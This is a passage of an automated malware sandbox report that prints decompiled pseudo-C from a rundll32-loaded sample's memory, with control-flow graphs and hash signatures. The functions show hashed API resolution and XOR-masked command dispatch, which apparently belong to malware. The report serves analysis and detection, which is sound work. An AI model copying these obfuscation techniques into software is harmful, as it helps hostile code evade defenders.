                                				if (_t199 == 0) goto 0xa29a714e;
                                				 *_t199();
                                				HeapFree(??, ??, ??);
                                				_t269 =  *((intOrPtr*)(_t272 + 0x88));
                                				r14d = r14d ^ 0x1a1a0866;
                                				if (E00000201201A29A91C8(_t123, r14d, _t199,  *((intOrPtr*)(_t272 + 0x30)), _t269,  *((intOrPtr*)(_t272 + 0x20)), _t253, _t198, _t272 + 0x20, _t272 + 0x90, _t292) != 0) goto 0xa29a723e;
                                				if (E00000201201A29A672C( *((intOrPtr*)(_t272 + 0x20)),  *((intOrPtr*)(_t272 + 0x20)), _t272 + 0x98) == 0) goto 0xa29a723e;
                                				if ( *((intOrPtr*)(_t272 + 0x98)) == 0) goto 0xa29a723e;
                                				E00000201201A29A908C(0x4a75e5e7, _t199,  *((intOrPtr*)( *0xa29ad458 + 0x10)));
                                				if (_t199 == 0) goto 0xa29a71de;
                                				 *_t199();
                                				E00000201201A29A908C(0x9c66d81c, _t199,  *((intOrPtr*)( *0xa29ad458 + 0x18)));
                                				if (_t199 == 0) goto 0xa29a71f8;
                                				 *_t199();
                                				_t201 =  *((intOrPtr*)(_t272 + 0x28)) + _t269 * 0x23c34600;
                                				 *((long long*)(_t272 + 0x28)) = _t201;
                                				 *((long long*)(_t253 + 0x30)) = _t201;
                                				E00000201201A29A908C(0x8d72aad2, _t201,  *((intOrPtr*)( *0xa29ad458 + 0x10)));
                                				if (_t201 == 0) goto 0xa29a723e;
                                				 *_t201();
                                				goto 0xa29a723e;
                                				goto 0xa29a7040;
                                				return 1;
                                			}

































                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.358453986.00000201A29A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000201A29A0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_201a29a0000_rundll32.jbxd
                                Similarity
                                • API ID: Heap$Free$Alloc$ErrorLast
                                • String ID: uJ$uJ$uJ
                                • API String ID: 1659099196-303439786
                                • Opcode ID: 0009eb8cc0e7ac2dbfe6d5ea119122e533f5930bbc08966e566b1206be97e56d
                                • Instruction ID: da058dc003b01b156ea4b8d410fcc0e5859ce17c396af372752feff27be8cd4b
                                • Opcode Fuzzy Hash: 0009eb8cc0e7ac2dbfe6d5ea119122e533f5930bbc08966e566b1206be97e56d
                                • Instruction Fuzzy Hash: 0AC18222306BA085FF68DB6AA44939B67A0F788F88F694025DE4D47797DF38C467C740
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 395 201a29a5638-201a29a5687 call 201a29a908c 398 201a29a5689-201a29a568c 395->398 399 201a29a5691-201a29a56a2 call 201a29a908c 395->399 398->399 402 201a29a56ab-201a29a56eb call 201a29a5ba4 call 201a29a13ec 399->402 403 201a29a56a4 399->403 408 201a29a59e0-201a29a59f9 402->408 409 201a29a56f1-201a29a5706 call 201a29a908c 402->409 403->402 412 201a29a5711 409->412 413 201a29a5708-201a29a570f 409->413 414 201a29a5713-201a29a5722 call 201a29a908c 412->414 413->414 418 201a29a572e 414->418 419 201a29a5724-201a29a572c 414->419 420 201a29a5731-201a29a5747 HeapAlloc 418->420 419->420 422 201a29a574d-201a29a576b call 201a29a47b0 420->422 423 201a29a59d2-201a29a59da HeapFree 420->423 426 201a29a576d-201a29a5774 422->426 427 201a29a57a3-201a29a57ba call 201a29aa238 422->427 423->408 426->427 428 201a29a5776-201a29a579e call 201a29a47b0 * 2 426->428 432 201a29a57c0-201a29a57e1 call 201a29a908c 427->432 433 201a29a59c4-201a29a59cc HeapFree 427->433 428->427 438 201a29a57ea 432->438 439 201a29a57e3-201a29a57e8 432->439 433->423 440 201a29a57ec-201a29a580b HeapAlloc 438->440 439->440 442 201a29a5811-201a29a584c call 201a29a5ba4 call 201a29a13ec 440->442 443 201a29a59b6 440->443 449 201a29a5852-201a29a5893 call 201a29ab158 HeapFree 442->449 450 201a29a59a8-201a29a59b0 HeapFree 442->450 444 201a29a59b9-201a29a59be HeapFree 443->444 444->433 453 201a29a5899-201a29a58a2 449->453 454 201a29a59fa-201a29a59ff 449->454 450->443 453->454 455 201a29a58a8-201a29a58c7 call 201a29a7cf4 453->455 454->433 455->450 458 201a29a58cd-201a29a58ee HeapAlloc 455->458 459 201a29a59a3 458->459 460 201a29a58f4-201a29a5931 call 201a29a5ba4 call 201a29a13ec 458->460 459->450 465 201a29a5933-201a29a5993 call 201a29ab158 * 2 460->465 466 201a29a5995-201a29a599d HeapFree 460->466 465->444 466->459
                                C-Code - Quality: 15%
                                			E00000201201A29A5638(long long __rbx, long long __rcx, void* __rdx, long long __r8, void* __r11) {
                                				void* __rbp;
                                				signed long long _t89;
                                				signed long long _t109;
                                				signed long long _t122;
                                				signed long long _t131;
                                				intOrPtr _t141;
                                				void* _t167;
                                				void* _t186;
                                				long long* _t187;
                                				long long _t188;
                                				long long _t190;
                                				long long _t192;
                                				long long* _t193;
                                				long long* _t234;
                                				long _t237;
                                				long _t240;
                                				void* _t243;
                                				void* _t248;
                                				void* _t249;
                                				void* _t264;
                                				void* _t269;
                                				void* _t270;
                                				long _t273;
                                				long _t277;
                                				void* _t281;
                                
                                				_t269 = __r11;
                                				_t192 = __rbx;
                                				_t186 = _t248;
                                				 *((long long*)(_t186 + 0x10)) = __rbx;
                                				 *((intOrPtr*)(_t186 + 0x20)) = r9d;
                                				 *((long long*)(_t186 + 0x18)) = __r8;
                                				 *((long long*)(_t186 + 8)) = __rcx;
                                				_t249 = _t248 - 0x50;
                                				_t244 =  *0xa29ad458;
                                				_t187 =  *0xa29ad448;
                                				 *((long long*)(_t249 + 0x38)) = _t187;
                                				E00000201201A29A908C(0x38e683e4, _t187,  *((intOrPtr*)( *0xa29ad458 + 0x18)));
                                				if (_t187 == _t237) goto 0xa29a5691;
                                				_t9 = _t237 + 0xa; // 0xa
                                				 *_t187();
                                				E00000201201A29A908C(0x9c66d81c, _t187,  *((intOrPtr*)( *0xa29ad458 + 0x18)));
                                				if (_t187 == _t237) goto 0xa29a56ab;
                                				 *_t187();
                                				_t12 = _t249 + 0x30; // -126
                                				_t89 = E00000201201A29A5BA4(_t12);
                                				_t13 = _t249 + 0x30; // -126
                                				r11d = _t89;
                                				r11d = r11d - ((r11d - (0x24924925 * r11d >> 0x20) >> 1) + (0x24924925 * r11d >> 0x20) >> 2) * 7;
                                				_t18 = _t269 + 3; // 0x3
                                				E00000201201A29A13EC(_t18, _t187, __rbx, _t13);
                                				 *((long long*)(_t249 + 0x40)) = _t187;
                                				if (_t187 == _t237) goto 0xa29a59e0;
                                				r12d = 0xfb849f8f;
                                				E00000201201A29A908C(r12d, _t187,  *((intOrPtr*)( *0xa29ad458 + 0x18)));
                                				if (_t187 == _t237) goto 0xa29a5711;
                                				 *_t187();
                                				goto 0xa29a5713;
                                				E00000201201A29A908C(r12d, _t187,  *((intOrPtr*)(_t244 + 0x18)));
                                				if (_t187 == _t237) goto 0xa29a572e;
                                				r13d =  *_t187();
                                				goto 0xa29a5731;
                                				r13d = 0;
                                				_t23 = _t192 + 7; // 0x7
                                				r8d = _t273 + _t23;
                                				HeapAlloc(_t281, _t277, _t273);
                                				if (_t187 == _t237) goto 0xa29a59d2;
                                				_t24 = _t192 + 1; // 0x1
                                				r8d = _t24;
                                				0xa29a47b0();
                                				if ( *((intOrPtr*)(_t249 + 0xa0)) == _t237) goto 0xa29a57a3;
                                				if ( *((intOrPtr*)(_t249 + 0xa8)) == 0) goto 0xa29a57a3;
                                				_t188 =  *((intOrPtr*)(_t249 + 0x38));
                                				r8d = 6;
                                				0xa29a47b0();
                                				_t32 = _t273 + 1; // 0x1
                                				r8d = _t32;
                                				0xa29a47b0();
                                				_t234 = _t187;
                                				if (E00000201201A29AA238(_t9, 0, _t167,  *((intOrPtr*)(_t249 + 0xa8)), _t192,  *((intOrPtr*)(_t249 + 0x90)), _t234, _t249 + 0x48, _t264) != 0) goto 0xa29a59c4;
                                				_t193 =  *((intOrPtr*)(_t249 + 0xb0));
                                				 *_t193 =  *((intOrPtr*)(_t249 + 0x48));
                                				E00000201201A29A908C(0xfb849f8f, _t188,  *((intOrPtr*)(_t244 + 0x18)));
                                				if (_t188 == _t237) goto 0xa29a57ea;
                                				 *_t188();
                                				goto 0xa29a57ec;
                                				 *((intOrPtr*)(_t193 + 0x10)) = 0;
                                				_t41 = _t234 + 0x34; // 0x34
                                				r8d = _t41;
                                				 *((intOrPtr*)(_t193 + 0x14)) = 1;
                                				HeapAlloc(_t270, _t237, _t240);
                                				if (_t188 == _t237) goto 0xa29a59b6;
                                				_t43 = _t249 + 0x30; // 0xfb849fcf
                                				_t109 = E00000201201A29A5BA4(_t43);
                                				_t44 = _t249 + 0x30; // 0xfb849fcf
                                				r11d = _t109;
                                				r11d = r11d - ((r11d - (0x24924925 * r11d >> 0x20) >> 1) + (0x24924925 * r11d >> 0x20) >> 2) * 7;
                                				_t49 = _t269 + 3; // 0x3
                                				E00000201201A29A13EC(_t49, _t188, _t193, _t44);
                                				if (_t188 == _t237) goto 0xa29a59a8;
                                				0xa29ab158();
                                				HeapFree(_t243, ??);
                                				 *((long long*)(_t193 + 8)) = _t188;
                                				if ( *((intOrPtr*)(_t249 + 0xa0)) == _t237) goto 0xa29a59fa;
                                				_t141 =  *((intOrPtr*)(_t249 + 0xa8));
                                				if (_t141 == 0) goto 0xa29a59fa;
                                				r8d = _t141;
                                				_t190 = _t193 + 0x28;
                                				 *((long long*)(_t249 + 0x20)) = _t190;
                                				if (E00000201201A29A7CF4(_t190, _t193,  *((intOrPtr*)(_t249 + 0x90)),  *((intOrPtr*)(_t249 + 0xa0)), _t188, _t193 + 0x18) != 0) goto 0xa29a59a8;
                                				r15d = 0x77;
                                				 *((intOrPtr*)(_t193 + 0x2c)) = 1;
                                				HeapAlloc(??, ??, ??);
                                				if (_t190 == _t237) goto 0xa29a59a3;
                                				_t62 = _t249 + 0x30; // 0xfb849fcf
                                				_t122 = E00000201201A29A5BA4(_t62);
                                				_t63 = _t249 + 0x30; // 0xfb849fcf
                                				r11d = _t122;
                                				r11d = r11d - ((r11d - (0x24924925 * r11d >> 0x20) >> 1) + (0x24924925 * r11d >> 0x20) >> 2) * 7;
                                				_t68 = _t269 + 3; // 0x3
                                				_t131 = E00000201201A29A13EC(_t68, _t190, _t193, _t63);
                                				 *((long long*)(_t249 + 0x48)) = _t190;
                                				if (_t190 == _t237) goto 0xa29a5995;
                                				0xa29ab158();
                                				r11d = _t131;
                                				r15d = r15d - r11d;
                                				 *((long long*)(_t249 + 0x20)) =  *((intOrPtr*)(_t249 + 0x38)) + 0x201a29b129f;
                                				0xa29ab158();
                                				 *((long long*)(_t193 + 0x20)) = _t190;
                                				goto 0xa29a59b9;
                                				HeapFree(??, ??, ??);
                                				HeapFree(??, ??, ??);
                                				HeapFree(??, ??, ??);
                                				HeapFree(??, ??, ??);
                                				HeapFree(??, ??, ??);
                                				return 2;
                                			}





























                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.358453986.00000201A29A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000201A29A0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_201a29a0000_rundll32.jbxd
                                Similarity
                                • API ID: Heap$Free$Alloc$ErrorLast
                                • String ID:
                                • API String ID: 1659099196-0
                                • Opcode ID: 8a526f4b4f4539653de5a656a5e2567e36e45d16e14d605094fa57f0b70ba07b
                                • Instruction ID: 359d1d6ae4aa86e2ddbd4c01b89cf8cf3333b2fcec665d603a99428615ad58d8
                                • Opcode Fuzzy Hash: 8a526f4b4f4539653de5a656a5e2567e36e45d16e14d605094fa57f0b70ba07b
                                • Instruction Fuzzy Hash: F5A1B466312BA086EF18DB2AE40929B67A1F7C8FC8F644111EE4E47B56DF38C567C700
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 542 201a29a7fd4-201a29a8011 543 201a29a80ef-201a29a80f6 542->543 544 201a29a8017-201a29a801c 542->544 545 201a29a814a 543->545 546 201a29a80f8-201a29a8109 call 201a29a908c 543->546 547 201a29a8022-201a29a8027 544->547 548 201a29a8115-201a29a8118 544->548 554 201a29a814f-201a29a8152 545->554 562 201a29a810b-201a29a8113 546->562 563 201a29a8139 546->563 550 201a29a80e9 547->550 551 201a29a802d-201a29a8032 547->551 552 201a29a811a-201a29a811d 548->552 553 201a29a80bf-201a29a80c4 548->553 550->543 556 201a29a81c8-201a29a81cf 551->556 557 201a29a8038-201a29a803d 551->557 558 201a29a8120 call 201a29a85cc 552->558 559 201a29a821b-201a29a8224 553->559 554->559 560 201a29a8158-201a29a815e 554->560 568 201a29a81fb 556->568 569 201a29a81d1-201a29a81f9 call 201a29a2874 HeapFree 556->569 561 201a29a8164-201a29a816c 557->561 566 201a29a8043-201a29a8048 557->566 567 201a29a8125-201a29a812b 558->567 564 201a29a8241-201a29a825b 559->564 565 201a29a8226-201a29a822c 559->565 560->559 560->561 570 201a29a81be-201a29a81c6 561->570 571 201a29a816e-201a29a8171 561->571 578 201a29a813e-201a29a8148 562->578 563->578 565->564 573 201a29a822e-201a29a8239 565->573 574 201a29a80c9-201a29a80da call 201a29a908c 566->574 575 201a29a804a-201a29a804f 566->575 576 201a29a812d-201a29a8134 567->576 577 201a29a80b5-201a29a80ba 567->577 572 201a29a8200-201a29a8203 568->572 569->572 570->556 570->559 571->570 581 201a29a8173-201a29a818f call 201a29a487a 571->581 572->559 582 201a29a8205-201a29a8212 572->582 584 201a29a823c call 201a29a6ac0 573->584 597 201a29a80dc 574->597 598 201a29a80e2-201a29a80e4 574->598 586 201a29a805b-201a29a805e 575->586 587 201a29a8051-201a29a8056 575->587 588 201a29a807a-201a29a808a 576->588 577->559 578->554 602 201a29a8192 call 201a29a5448 581->602 591 201a29a8214 call 201a29a9214 582->591 584->564 586->553 593 201a29a8060-201a29a8063 586->593 587->559 589 201a29a808d call 201a29a14b8 588->589 594 201a29a8092-201a29a8096 
589->594 596 201a29a8219 591->596 599 201a29a8066 call 201a29a85cc 593->599 600 201a29a80a2-201a29a80b0 HeapFree 594->600 601 201a29a8098-201a29a809d 594->601 596->559 597->598 598->559 603 201a29a806b-201a29a8071 599->603 600->559 601->559 605 201a29a8197-201a29a8199 602->605 603->577 604 201a29a8073 603->604 604->588 606 201a29a819b-201a29a81ac call 201a29a672c 605->606 607 201a29a81bc 605->607 606->570 610 201a29a81ae-201a29a81b7 606->610 607->570 610->607
                                C-Code - Quality: 46%
                                			E00000201201A29A7FD4(signed int __edx, char* __rax, long long __rbx, void* __rcx, long long __rsi, void* __r8) {
                                				void* __rdi;
                                				signed int _t34;
                                				void* _t66;
                                				char* _t104;
                                				void* _t131;
                                				char* _t134;
                                				long long _t140;
                                				void* _t141;
                                				void* _t143;
                                				void* _t144;
                                				signed long long _t156;
                                				void* _t158;
                                
                                				_t106 = __rbx;
                                				_t104 = __rax;
                                				 *((long long*)(_t143 + 8)) = __rbx;
                                				 *((long long*)(_t143 + 0x18)) = _t140;
                                				 *((long long*)(_t143 + 0x20)) = __rsi;
                                				_t144 = _t143 - 0x40;
                                				r14d =  *0xa29ad450;
                                				_t141 = __rcx;
                                				_t137 =  *((intOrPtr*)( *0xa29ad458 + 8));
                                				r12d = 0;
                                				_t34 = r14d ^ __edx;
                                				if (_t34 == 0x139d2b8d) goto 0xa29a80ef;
                                				if (_t34 == 0x15f5a8c2) goto 0xa29a8115;
                                				if (_t34 == 0x2f77acf9) goto 0xa29a80e9;
                                				if (_t34 == 0x48e12436) goto 0xa29a81c8;
                                				if (_t34 == 0x4d382929) goto 0xa29a8164;
                                				if (_t34 == 0xb016dc39) goto 0xa29a80c9;
                                				if (_t34 == 0xb057dfc9) goto 0xa29a805b;
                                				goto 0xa29a821b;
                                				if (r9d == 0) goto 0xa29a80bf;
                                				E00000201201A29A85CC(r9d, __rbx, __r8,  *((intOrPtr*)( *0xa29ad458 + 8)), _t158);
                                				if (_t104 == 0) goto 0xa29a80b5;
                                				 *(_t144 + 0x20) =  *(_t144 + 0x20) & _t156;
                                				if (E00000201201A29A14B8(_t104, _t106, _t141, 0x201a29a34a4,  *((intOrPtr*)( *0xa29ad458 + 8)), _t104,  *((intOrPtr*)(_t144 + 0x80))) != 0) goto 0xa29a80a2;
                                				goto 0xa29a821b;
                                				HeapFree(_t131, ??);
                                				goto 0xa29a821b;
                                				goto 0xa29a821b;
                                				goto 0xa29a821b;
                                				E00000201201A29A908C(0xd97160e4, _t104,  *((intOrPtr*)( *((intOrPtr*)( *0xa29ad458 + 8)) + 0x18)));
                                				if (_t104 == 0) goto 0xa29a80e2;
                                				 *_t104();
                                				goto 0xa29a821b;
                                				r12d = 1;
                                				if ( *(_t141 + 0x50) == 0) goto 0xa29a814a;
                                				E00000201201A29A908C(0xf2d20ec6, _t104,  *((intOrPtr*)( *((intOrPtr*)(_t141 + 0x28)) + 0x18)));
                                				if (_t104 == 0) goto 0xa29a8139;
                                				 *_t104();
                                				goto 0xa29a813e;
                                				if (r9d == 0) goto 0xa29a80bf;
                                				E00000201201A29A85CC(r9d,  *(_t141 + 0x50), _t104,  *((intOrPtr*)( *0xa29ad458 + 8)), _t156);
                                				_t134 = _t104;
                                				if (_t104 == 0) goto 0xa29a80b5;
                                				goto 0xa29a807a;
                                				asm("sbb ebx, ebx");
                                				goto 0xa29a814f;
                                				if (r12d == 0) goto 0xa29a821b;
                                				if (0x426 != 0x426) goto 0xa29a821b;
                                				if (_t134 == 0) goto 0xa29a81be;
                                				if ( *_t134 == 0) goto 0xa29a81be;
                                				E00000201201A29A487A();
                                				if (E00000201201A29A5448(_t104,  *(_t141 + 0x50), _t134, _t144 + 0x30, _t137, _t141) != 0) goto 0xa29a81bc;
                                				if (E00000201201A29A672C(_t134, _t144 + 0x30, _t144 + 0x68) == 0) goto 0xa29a81be;
                                				asm("ror ax, 0x8");
                                				 *((short*)(_t144 + 0x32)) =  *(_t144 + 0x68) & 0x0000ffff;
                                				r12d = 1;
                                				if (0 != 0) goto 0xa29a821b;
                                				if ( *(_t141 + 0x50) == 0) goto 0xa29a81fb;
                                				 *(_t141 + 0x50) =  *(_t141 + 0x50) & 0x00000000;
                                				E00000201201A29A2874( *((intOrPtr*)( *0xa29ad458 + 8)),  *(_t141 + 0x50), _t134,  *(_t141 + 0x50));
                                				HeapFree(??, ??, ??);
                                				goto 0xa29a8200;
                                				if (r12d == 0) goto 0xa29a821b;
                                				_t27 = _t144 + 0x30; // 0x31
                                				_t66 = E00000201201A29A9214( *((intOrPtr*)( *0xa29ad458 + 8)), _t27, _t134,  *(_t141 + 0x50), _t141,  *((intOrPtr*)(_t141 + 0x38)), _t141 + 0x50);
                                				if ( *((long long*)(_t144 + 0x80)) == 0) goto 0xa29a8241;
                                				if (_t66 == 0x3e5) goto 0xa29a8241;
                                				r8d = _t66;
                                				E00000201201A29A6AC0( *0xa29ad458,  *((intOrPtr*)( *0xa29ad458 + 8)), _t141,  *((intOrPtr*)(_t144 + 0x80)),  *(_t141 + 0x50), _t141);
                                				return _t66;
                                			}
















                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.358453986.00000201A29A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000201A29A0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_201a29a0000_rundll32.jbxd
                                Similarity
                                • API ID: FreeHeap
                                • String ID: ))8M$6$H$lJu
                                • API String ID: 3298025750-2816507560
                                • Opcode ID: e943009c52edc3a9ff9218d50e7176983ae45fe1d98091206747ec6dadb96f7e
                                • Instruction ID: 967abaa9d643e3318b2c34e89ebda9a65894770696001b92c464e367763972f7
                                • Opcode Fuzzy Hash: e943009c52edc3a9ff9218d50e7176983ae45fe1d98091206747ec6dadb96f7e
                                • Instruction Fuzzy Hash: 0E617121306BA145FFAC9A6E948D3AB52A1B784FCCF784121DE4947797DE28C867C302
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                C-Code - Quality: 17%
                                			E00000201201A29A1BFC(long long* __rax, long long __rbx, intOrPtr* __rcx, long long __rdx, intOrPtr _a8, long long _a16, long long _a24, long long _a40, long long _a48) {
                                				long long _v72;
                                				char _v80;
                                				char _v88;
                                				long long _v96;
                                				char _v104;
                                				signed int _v112;
                                				long long _v120;
                                				long long _v128;
                                				intOrPtr _v136;
                                				void* __rdi;
                                				void* __rsi;
                                				void* __rbp;
                                				signed int _t65;
                                				intOrPtr _t93;
                                				intOrPtr _t94;
                                				long long* _t148;
                                				long long* _t152;
                                				long long* _t155;
                                				long long* _t157;
                                				intOrPtr* _t188;
                                				intOrPtr _t189;
                                				long long _t192;
                                				long long* _t193;
                                				void* _t203;
                                				intOrPtr _t213;
                                				long long _t214;
                                
                                				_t157 = __rbx;
                                				_t148 = __rax;
                                				_a24 = __rbx;
                                				_a16 = __rdx;
                                				_t214 =  *0xa29ad458;
                                				_t192 =  *((intOrPtr*)(__rcx));
                                				r13d = r8d;
                                				_t193 = __rcx;
                                				_v72 = _t214;
                                				_v96 = _t192;
                                				if ( *((intOrPtr*)(__rcx + 0x70)) -  *((intOrPtr*)(__rcx + 0x50)) < 0) goto 0xa29a1c4a;
                                				E00000201201A29A47B8(0, __rax, __rbx, __rcx, __rdx);
                                				E00000201201A29A908C(0x4a75e5e7, __rax,  *((intOrPtr*)(_t214 + 0x10)));
                                				if (_t148 == _t157) goto 0xa29a1c63;
                                				_t9 = _t192 + 0x18; // 0x18
                                				 *_t148();
                                				_t65 =  *(_t193 + 0x50) & 0x000000ff;
                                				if (( *(_t193 + 0x70) & 0x000000ff) - _t65 >= 0) goto 0xa29a1cdd;
                                				_t188 =  *((intOrPtr*)( *((intOrPtr*)(_t193 + 0x48)) + _t9 * 8));
                                				_t93 =  *_t188;
                                				if (_t93 == 0) goto 0xa29a1c94;
                                				if (_t93 == 0x2f) goto 0xa29a1c90;
                                				_t94 =  *((intOrPtr*)(_t188 + 1));
                                				if (_t94 != 0) goto 0xa29a1c82;
                                				if (_t94 != 0) goto 0xa29a1c97;
                                				_t152 = _t157;
                                				if (_t152 == _t157) goto 0xa29a1caf;
                                				if ( *((char*)(_t152 - 1)) != 0x3a) goto 0xa29a1caf;
                                				if ( *((char*)(_t152 + 1)) != 0x2f) goto 0xa29a1caf;
                                				E00000201201A29A240C(0, _t157, _t9 + _t188, _t192, _t193);
                                				if (_t152 == _t157) goto 0xa29a1cdd;
                                				bpl = _t65 - 0x4a75e5e7 + 2 == 8;
                                				_a8 = 0;
                                				goto 0xa29a1ceb;
                                				E00000201201A29A908C(0x8d72aad2, _t152,  *((intOrPtr*)(_t214 + 0x10)));
                                				if (_t152 == _t157) goto 0xa29a1d09;
                                				 *_t152();
                                				if (_t152 == _t157) goto 0xa29a1ed1;
                                				_t23 =  &_v104; // 0x2
                                				r9d = 0;
                                				r8d = r13d;
                                				_v112 = _t23;
                                				_t25 =  &_v88; // 0x12
                                				_t189 = _a16;
                                				_v120 = _t25;
                                				_t27 =  &_v80; // 0x1a
                                				_t155 = _t27;
                                				_v128 = _t155;
                                				_v136 = 0;
                                				if (E00000201201A29A5168(_t157, _t193, _t189, _t203) != 0) goto 0xa29a1ec1;
                                				_t213 =  *0xa29ad458;
                                				E00000201201A29A908C(0x4a75e5e7, _t155,  *((intOrPtr*)(_t213 + 0x10)));
                                				if (_t155 == _t157) goto 0xa29a1d77;
                                				 *_t155();
                                				if ( *((intOrPtr*)(_t193 + 0x18)) == _t157) goto 0xa29a1d8c;
                                				E00000201201A29A240C(0, _t157,  *((intOrPtr*)(_t193 + 0x18)), _t192, _t193);
                                				goto 0xa29a1d94;
                                				E00000201201A29A908C(0x8d72aad2, _t155,  *((intOrPtr*)(_t213 + 0x10)));
                                				if (_t155 == _t157) goto 0xa29a1dad;
                                				 *_t155();
                                				if (_a8 == _t157) goto 0xa29a1ea1;
                                				E00000201201A29A908C(0xfb849f8f, _t155,  *((intOrPtr*)(_t214 + 0x18)));
                                				if (_t155 == _t157) goto 0xa29a1dd5;
                                				r14d =  *_t155();
                                				goto 0xa29a1dd8;
                                				r14d = 0;
                                				E00000201201A29A908C(0xfb849f8f, _t155,  *((intOrPtr*)(_v72 + 0x18)));
                                				if (_t155 == _t157) goto 0xa29a1df7;
                                				r13d =  *_t155();
                                				goto 0xa29a1dfa;
                                				r13d = 0;
                                				_t40 = _t214 + 2; // 0x2
                                				E00000201201A29A240C(_t213 + _t40, _t157, _t152, _t192, _a8);
                                				if (_t155 == _t157) goto 0xa29a1e93;
                                				_t41 = _t213 + 1; // 0x1
                                				r8d = _t41;
                                				 *((char*)(_t189 + _t155)) = 0x2f;
                                				0xa29a47b0();
                                				_v112 = 0 | _a8 != 0x00000000 | 0x00000002;
                                				_v120 = _a48;
                                				_v128 = _a40;
                                				_v136 = _v104;
                                				if (E00000201201A29A6518(_a40, _v96, _t155, _t192, _a8, _t155, _v80, _v88) != 0x10d2) goto 0xa29a1e85;
                                				asm("sbb eax, eax");
                                				HeapFree(??, ??, ??);
                                				HeapFree(??, ??, ??);
                                				HeapFree(??, ??, ??);
                                				HeapFree(??, ??, ??);
                                				HeapFree(??, ??, ??);
                                				goto 0xa29a1ed6;
                                				return 8;
                                			}






























                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.358453986.00000201A29A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000201A29A0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_201a29a0000_rundll32.jbxd
                                Similarity
                                • API ID: FreeHeap$ErrorLast
                                • String ID: uJ$uJ
                                • API String ID: 2332451156-3171342107
                                • Opcode ID: 7d8230a046c4e347e58ee4c4be8fc8a96b4e0ab99a4e879f048771c8d09b0c9e
                                • Instruction ID: 7ceb53e716cfd62756d0d8805b11dfc085cf105fc13c582d9c9550b5a3447f23
                                • Opcode Fuzzy Hash: 7d8230a046c4e347e58ee4c4be8fc8a96b4e0ab99a4e879f048771c8d09b0c9e
                                • Instruction Fuzzy Hash: 1681B4227067A086EF64DB1AA45826B77A1F7C9F88F684421DE8E47746DF38C456C700
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                C-Code - Quality: 19%
                                			E00000201201A29AA238(void* __ecx, void* __edi, void* __ebp, void* __eflags, long long __rbx, void* __rcx, void* __rdx, long long __r8, void* __r9, void* _a8, long long* _a24, char _a32) {
                                				char _v72;
                                				char _v80;
                                				char _v88;
                                				long long _v104;
                                				void* __rdi;
                                				void* __rsi;
                                				void* __rbp;
                                				void* _t41;
                                				void* _t43;
                                				long long* _t82;
                                				long long _t83;
                                				long long _t84;
                                				intOrPtr _t108;
                                				void* _t109;
                                				intOrPtr _t110;
                                				void* _t112;
                                				void* _t115;
                                				long long* _t118;
                                				void* _t130;
                                				long _t133;
                                				void* _t134;
                                				long _t136;
                                				void* _t139;
                                
                                				_t84 = __rbx;
                                				_t82 = _t118;
                                				 *((long long*)(_t82 + 8)) = __rbx;
                                				 *((long long*)(_t82 + 0x18)) = __r8;
                                				_t3 = _t82 + 0x20; // 0xfb849fa7
                                				_t134 = __rcx;
                                				E00000201201A29A24B0(__rbx, _t3, _t112);
                                				if (_t82 == 0) goto 0xa29aa3dc;
                                				E00000201201A29A908C(0xfb849f8f, _t82,  *((intOrPtr*)( *0xa29ad458 + 0x18)));
                                				if (_t82 == 0) goto 0xa29aa29f;
                                				_v88 =  *_t82();
                                				goto 0xa29aa2a5;
                                				_v88 = 0;
                                				_t10 = _t82 + 1; // 0x1
                                				r8d = _t109 + _t10;
                                				HeapAlloc(_t139, _t136, _t133);
                                				_v80 = _t82;
                                				if (_t82 == 0) goto 0xa29aa3ce;
                                				0xa29a47b0();
                                				_t13 = _t109 + 1; // 0x1
                                				r8d = _t13;
                                				0xa29a47b0();
                                				E00000201201A29A908C(0xfb849f8f, _t82,  *((intOrPtr*)( *0xa29ad458 + 0x18)));
                                				if (_t82 == 0) goto 0xa29aa30d;
                                				 *_t82();
                                				goto 0xa29aa30f;
                                				_t16 =  &_a32; // 0xfb84a007
                                				_t17 =  &_v72; // 0xfb849f9f
                                				r8d = 0;
                                				_v104 = _t16;
                                				_t41 = E00000201201A29A7CF4(_t82, _t84, _t134, _t82,  *((intOrPtr*)( *0xa29ad458 + 8)), _t17, _t130, _t109);
                                				HeapFree(??, ??, ??);
                                				if (_t41 != 0) goto 0xa29aa3ce;
                                				r8d = _a32;
                                				_t108 = _v72;
                                				_t21 =  &_v88; // 0xfb849f8f
                                				_t83 = _t21;
                                				_t22 =  &_v80; // 0xfb849f87
                                				_v104 = _t83;
                                				_t43 = E00000201201A29A52B8(_t84, _t108, _t82,  *((intOrPtr*)( *0xa29ad458 + 8)), _t22, _t112, _t115);
                                				_t110 = _v80;
                                				if (_v88 == 0) goto 0xa29aa389;
                                				if ( *((char*)(_t108 + _t110)) != 0x3d) goto 0xa29aa389;
                                				if (_t134 - 1 != 0) goto 0xa29aa37a;
                                				 *((char*)(_t83 + _t110)) = 0;
                                				if (_t43 != 0) goto 0xa29aa3b0;
                                				E00000201201A29A7500(_t84, _t110, _t108, _t110, _t82,  *((intOrPtr*)( *0xa29ad458 + 8)));
                                				if (_t83 != 0) goto 0xa29aa3a5;
                                				_t29 = _t83 + 8; // 0x8
                                				goto 0xa29aa3b0;
                                				 *_a24 = _t83;
                                				HeapFree(??, ??, ??);
                                				HeapFree(??, ??, ??);
                                				HeapFree(??, ??, ??);
                                				return _t29;
                                			}



























                                APIs
                                Memory Dump Source
